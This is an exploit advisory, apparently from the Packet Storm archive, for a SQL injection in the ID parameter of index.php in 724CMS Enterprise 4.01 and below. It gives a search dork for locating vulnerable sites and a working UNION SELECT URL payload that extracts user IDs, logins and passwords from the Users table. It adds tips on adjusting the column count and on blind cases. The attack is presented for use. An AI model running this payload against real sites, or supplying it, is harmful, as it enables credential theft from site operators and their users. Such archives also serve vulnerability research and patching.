724CMS Enterprise versions 4.01 and below suffer from a remote SQL injection vulnerability.
d733ae69147382983e400dea05833051cb784b24d4758f28ac251c423d44fe41###################################################################################
# #
# 724CMS <= 4.01 Enterprise - SQL Injection Vulnerability #
# #
# found by: Lidloses_Auge #
# Date: 07.04.2008 #
# Contact (ICQ): 120946783 #
# Greetz to: free-hack.com #
# #
###############################################################################################################################################
# #
# Vulnerability: #
# #
# Document: index.php #
# GET-Parameter: ID #
# #
# Dork: #
# #
# 724CMS + "Version 4.01" #
# #
# Example: #
# #
# http://[target]/index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14, #
# 15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users-- #
# #
# Notes: #
# #
# The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections. #
# #
###############################################################################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed